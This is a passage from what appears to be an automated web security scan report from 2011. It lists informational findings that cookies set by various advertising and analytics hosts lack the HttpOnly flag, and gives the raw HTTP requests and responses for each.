Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRnG5PfoGDu5MX8o%2FxCDWsZc6RedmkLm9fpn1D8s%2FukPPO0gSuLJ9HZwXOkl51UxtBM6eJVXAkUdmZcup3zY1PulEbjln1ejUsRequmjMcM5FobG%2B3uzEcnhK0sQsuZmLLLub9FxkdcpMXeSmH%2FLYLwGlQTiQLy4h4HgATUlRCtHsLPBa%2FXGw%3D%3D"; vsd=0@1@4dcbe0cc@bcp.crwdcntrl.net

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AXZHbkoMgEET%2FhWceAEWt%2FE2Md24CitGQfw%2BQ3Vrd1zPdPdM1L%2BAIuL0Aa%2FdNmcaCGzAbF6vHWtiy9NgjGIGNYC6bBB7DUPUa3V2AvF%2BEJ76GdhxlFlU1SjaPJ4aiVlJG6NJ%2FR23QkgZqnR1bIFVmeCCYBh0vxp1OgZrccfWzKJk7dTH%2FUnGhlrecB1Ivm%2FKlL%2BoMznKzLuVZdMmT%2F%2FLi6iKPtEErP3cc5gCPafgWn59Oh7HBk8sTsCxbokJoiVPpXCj0Z1ZnsxFKpiK6qc7XjPTag1gTsua9k9LfPcbLAW3VFSLupdPzfF1LonVA%2FSmvKB%2FXPIbJmryMRhmAoL5L2ZoxfRu83x8%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:33:36 GMT
Set-Cookie: vsd=0@1@4dcbe1b0@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 13:33:36 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Thu, 12 May 2011 13:33:36 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
9.51. http://cm.npc-gatehouse.overture.com/js_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-gatehouse.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=5970914500&type=news&keywordCharEnc=utf8&mkt=us&source=npc_gatehouse_mysuburbanlife_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th&outputCharEnc=utf8&tg=1&bc=dbdbdb&cc=ffffff&lc=000000&tc=666666&uc=666666&du=1&cb=1305207048874&ctxtContent=%3Chead%3E%0A%09%09%0A%09%09%09%3Cbase%20href%3D%22http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%22%3E%0A%09%09%0A%09%09%0A%09%09%09%3Ctitle%3ETo%20do%20tonight%3A%20Watch%20'American%20Idol'%3B%20%22Priest%22%20opens%20Friday%20the%2013th%20%20-%20Lyons%2C%20IL%20-%20Lyons%20Suburban%20Life%3C%2Ftitle%3E%0A%09%09%0A%09%09%0A%09%09%3Cmeta%20content%3D%22Lyons%20Suburban%20Life%20-%20%0A%09Your%20daily%20entertainment%20update%20with%20items%20on%20%26amp%3Bquot%3BAmerican%20Idol%26amp%3Bquot%3B%20tonight%20on%20Fox%2C%20%26amp%3Bquot%3BPriest%26amp%3Bquot%3B%20opening%20on%20Friday%20the%2013th%20and%20a%20recipe%20 HTTP/1.1
Host: cm.npc-gatehouse.overture.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=76of9et6r747t&b=3&s=m1; UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDVzczEwNzU1MACxpU6ww=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:13 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDVzczE7ygI5tUAA1eCw==; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Sun, 09-May-2021 13:32:13 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4749


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
9.52. http://cm.npc-scripps.overture.com/js_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-scripps.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=7894763060&type=entertainment&ctxtId=entertainment&keywordCharEnc=utf8&source=npc_scripps_courierpress_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.courierpress.com%2Fnews%2F2011%2Fmay%2F12%2Fheder-here-in-this-spp-ppppp%2F&css_url=http://media.scrippsnewspapers.com/yahoo/yahoo_cm.css&du=1&cb=1305207046691&ctxtContent=%3C!--%0A%20%20%0A%20%20%20%20%0A%20%20%20%20ROLE%20%3D%20prod.%0A--%3E%3Chead%3E%0A%09%0A%09%09%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%09%09%09var%20jSINGconf%20%3D%20%7B%7D%3B%0A%09%09%09jSINGconf.theme%20%3D%20%7B%0A%09%09%09%09%0A%09%09%09%09%09CITY%3A%20'Evansville'%2C%0A%09%09%09%09%0A%09%09%09%09%09SITE_NAME%3A%20'Evansville%20Courier%20%26%20Press'%2C%0A%09%09%09%09%0A%09%09%09%09%09VIDEO_MEDIA_URL%3A%20'http%3A%2F%2Fmedia.scrippsnewspapers.com%2Fcorp_assets%2Fasphalt'%2C%0A%09%09%09%09%0A%09%09%09%09%09SITE_MEDIA_URL%3A%20'http%3A%2F%2Fweb.courierpress.com%2Fstatic%2Fecp%2Fasphalt%2Fprod'%2C%0A%09%09%09%09%0A%09%09%09%09%09REGION%3A%20'Evansville'%2C%0A%09%09%09%09%0A%09%09%09%09%09MOBILE_SITE_NAME%3A%20'Evansville%20Courier%20%26%20Press%20Mobile'%2C%0A%09%09%09%09%0A%09%09%09%09%09SITE_URL%3A%20'http%3A%2F%2Fwww HTTP/1.1
Host: cm.npc-scripps.overture.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=76of9et6r747t&b=3&s=m1; UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDFzcLUwNnC2MAc2BU%2bQw=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDVzczE2MLZxcAA2xUBA0=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Sun, 09-May-2021 13:32:07 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4391


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_top">
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
9.53. http://core.insightexpressai.com/adServer/adServerESI.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adServer/adServerESI.aspx?bannerID=175391&siteID=312545312&creativeID=208464546 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074; IXAIBannerCounter175183=1; IXAIControlCounter2554=1; lastInvite=4%2f23%2f2011+4%3a30%3a01+PM; IXAIinvited2554=true; IXAIBannerCounter174602=1; IXAIFirstHit2460=4%2f23%2f2011+4%3a31%3a40+PM; IXAIBanners2460=174602,174595; IXAIBannerCounter174595=1; IXAILastHit2460=5%2f2%2f2011+2%3a16%3a33+PM; IXAICampaignCounter2460=2; IXAIFirstHit2579=5%2f2%2f2011+1%3a51%3a33+PM; IXAIBanners2708=178563; IXAIBannerCounter178563=1; IXAIFirstHit2708=5%2f9%2f2011+10%3a48%3a33+AM; IXAILastHit2708=5%2f9%2f2011+10%3a48%3a33+AM; IXAICampaignCounter2708=1; IXAIBanners2579=178140,178140,178140,178140,178140; IXAIBannerCounter178140=5; IXAILastHit2579=5%2f11%2f2011+10%3a28%3a40+AM; IXAICampaignCounter2579=5; IXAIBanners2554=175183,175237; IXAIBannerCounter175237=1; IXAIFirstHit2554=5%2f12%2f2011+7%3a38%3a14+AM; IXAILastHit2554=5%2f12%2f2011+7%3a38%3a14+AM; IXAICampaignCounter2554=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Length: 8
Content-Type: text/javascript; charset=utf-8
Set-Cookie: IXAIBanners2579=178140,178140,178140,178140,178140,178406; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIBannerCounter178406=1; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAILastHit2579=5%2f12%2f2011+9%3a29%3a08+AM; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAICampaignCounter2579=6; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Thu, 12 May 2011 13:30:22 GMT
Pragma: no-cache
Date: Thu, 12 May 2011 13:30:22 GMT
Connection: close
Cache-Control: no-store


9.54. http://crenk.com/buy-chromebook/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /buy-chromebook/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /buy-chromebook/ HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html;charset=UTF-8
Date: Thu, 12 May 2011 13:28:15 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; path=/
Last-Modified: Thu, 12 May 2011 10:10:43 +0000
Content-Length: 32569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
9.55. http://csc.beap.ad.yieldmanager.net/i  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://csc.beap.ad.yieldmanager.net
Path:   /i

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i?bv=1.0.0&bs=(124eo0etg(gid$05b3aac4-7c9c-11e0-aa06-8f5862548d58,st$1305207037351011,v$1.0))&t=blank&al=(as$128attrav,aid$hnH5BEwNjVA-,bi$775222551,ct$25,at$0) HTTP/1.1
Host: csc.beap.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=128

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:36 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=6tn4u2h6sno9o&t=1305207096;path=/; expires=
Cache-Control: no-cache, private
Accept-Charset: utf-8
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
9.56. http://dw.zdnet.com/clear/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dw.zdnet.com
Path:   /clear/c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clear/c.gif?ts=1305206958782057&clgf=Cg8JIk24ijttAAAASDs HTTP/1.1
Host: dw.zdnet.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; MADTEST=1; __utmz=11603627.1305206897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11603627.345061338.1305206897.1305206897.1305206897.1; __utmc=11603627; __utmb=11603627.2.10.1305206897; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10087&ASK05540_10174&ASK05540_10185&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10283&ASK05540_10287&ASK05540_10290&ASK05540_10319&ASK05540_10342&ASK05540_10343&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10432&ASK05540_10458&ASK05540_10537&ASK05540_10538&ASK05540_10562&ASK05540_10265&ASK05540_10166&ASK05540_10249&ASK05540_10263&ASD08734_72078

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:23 GMT
Server: Apache/2.0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, no-transform
Vary: *
Expires: Fri, 23 Jan 1970 12:12:12 GMT
Set-Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs; expires=Tue, 11-May-2021 13:31:23 GMT; domain=.zdnet.com; path=/
Content-Length: 42
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cneonction: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;
9.57. http://ewsnewspapers.112.2o7.net/b/ss/ews.h.evansville/1/H.22.1/s22444411469623  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ewsnewspapers.112.2o7.net
Path:   /b/ss/ews.h.evansville/1/H.22.1/s22444411469623

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/ews.h.evansville/1/H.22.1/s22444411469623?AQB=1&ndh=1&t=12%2F4%2F2011%208%3A30%3A39%204%20300&ce=UTF-8&pageName=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&g=http%3A%2F%2Fwww.courierpress.com%2Fnews%2F2011%2Fmay%2F12%2Fheder-here-in-this-spp-ppppp%2F&cc=USD&ch=ENTERTAINMENT&events=event1&h1=ews.h.evansville%3AENTERTAINMENT%3ALOCAL%3AARTICLE%3AHEDER-HERE-IN-THIS-SPP-PPPPP&h2=ews.h.evansville%3AENTERTAINMENT%3ALOCAL%3AARTICLE%3AHEDER-HERE-IN-THIS-SPP-PPPPP&c3=ECP&c4=DJEFF&c6=LOCAL&c7=ARTICLE&c8=HEDER-HERE-IN-THIS-SPP-PPPPP&c10=courierpress.com%2Fnews%2F2011%2Fmay%2F12%2Fheder-here-in-this-spp-ppppp%2F&c16=Entertainment%20(NPC)&c19=ECP%3Aews.h.evansville%3AENTERTAINMENT%3ALOCAL%3AARTICLE%3AHEDER-HERE-IN-THIS-SPP-PPPPP&c25=8%3A00AM&c26=Thursday&c27=Weekday&c30=ECP&c43=Evansville%20Courier%20%26%20Press%20and%20Evansville%20Courier%20%26%20Press&c44=1&c45=5&c50=Entertainment%2FLocal&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1020&bh=950&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: ewsnewspapers.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_tycpx7Bqtax7Dzxxfzx7Bgpx60apgf=[CS]v4|26E3F9DC051D33BE-40000101E0003608|4DC7F3B6[CE]; s_vi_l8dx7Ebox7Ccdo=[CS]v4|26E3F9DC05010F7F-6000010EC0264A83|4DC7F3B6[CE]; s_vi_gydhix7Eenks=[CS]v4|26E408110515A577-600001774000CAA9|4DC81020[CE]; s_vi_nyhylx7B8x3Dx3C=[CS]v4|26E40823051586B2-60000175A008DCBA|4DC81044[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E40823051586B2-60000175A008DCBC|4DC81044[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26E49D3B850131F4-60000102002237AC|4DC93A73[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmqljpxxjmx7Euvx7Bxxu=[CS]v4|26E49D3B850131F4-60000102002237AE|4DC93A73[CE]; s_vi_kxxwwupgxxbrbssx7Dx7Evb=[CS]v4|26E49D3B850131F4-60000102002237B0|4DC93A73[CE]; s_vi_wdkkilx7Bdx7Ejhhf=[CS]v4|26E49D3B850131F4-60000102002237B2|4DC93A73[CE]

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 13:33:38 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_ugcx3Exxx3Eufqx7Ecfyx7Cx7Cu=[CS]v4|0-0|4DCBE1B2[CE]; Expires=Tue, 10 May 2016 13:33:38 GMT; Domain=.2o7.net; Path=/
Location: http://ewsnewspapers.112.2o7.net/b/ss/ews.h.evansville/1/H.22.1/s22444411469623?AQB=1&pccr=true&&ndh=1&t=12%2F4%2F2011%208%3A30%3A39%204%20300&ce=UTF-8&pageName=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&g=http%3A%2F%2Fwww.courierpress.com%2Fnews%2F2011%2Fmay%2F12%2Fheder-here-in-this-spp-ppppp%2F&cc=USD&ch=ENTERTAINMENT&events=event1&h1=ews.h.evansville%3AENTERTAINMENT%3ALOCAL%3AARTICLE%3AHEDER-HERE-IN-THIS-SPP-PPPPP&h2=ews.h.evansville%3AENTERTAINMENT%3ALOCAL%3AARTICLE%3AHEDER-HERE-IN-THIS-SPP-PPPPP&c3=ECP&c4=DJEFF&c6=LOCAL&c7=ARTICLE&c8=HEDER-HERE-IN-THIS-SPP-PPPPP&c10=courierpress.com%2Fnews%2F2011%2Fmay%2F12%2Fheder-here-in-this-spp-ppppp%2F&c16=Entertainment%20(NPC)&c19=ECP%3Aews.h.evansville%3AENTERTAINMENT%3ALOCAL%3AARTICLE%3AHEDER-HERE-IN-THIS-SPP-PPPPP&c25=8%3A00AM&c26=Thursday&c27=Weekday&c30=ECP&c43=Evansville%20Courier%20%26%20Press%20and%20Evansville%20Courier%20%26%20Press&c44=1&c45=5&c50=Entertainment%2FLocal&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1020&bh=950&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 13:33:38 GMT
Last-Modified: Fri, 13 May 2011 13:33:38 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www109
Content-Length: 0
Content-Type: text/plain

9.58. http://hits.nextstat.com/cgi-bin/wsv2.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hits.nextstat.com
Path:   /cgi-bin/wsv2.cgi

Issue detail

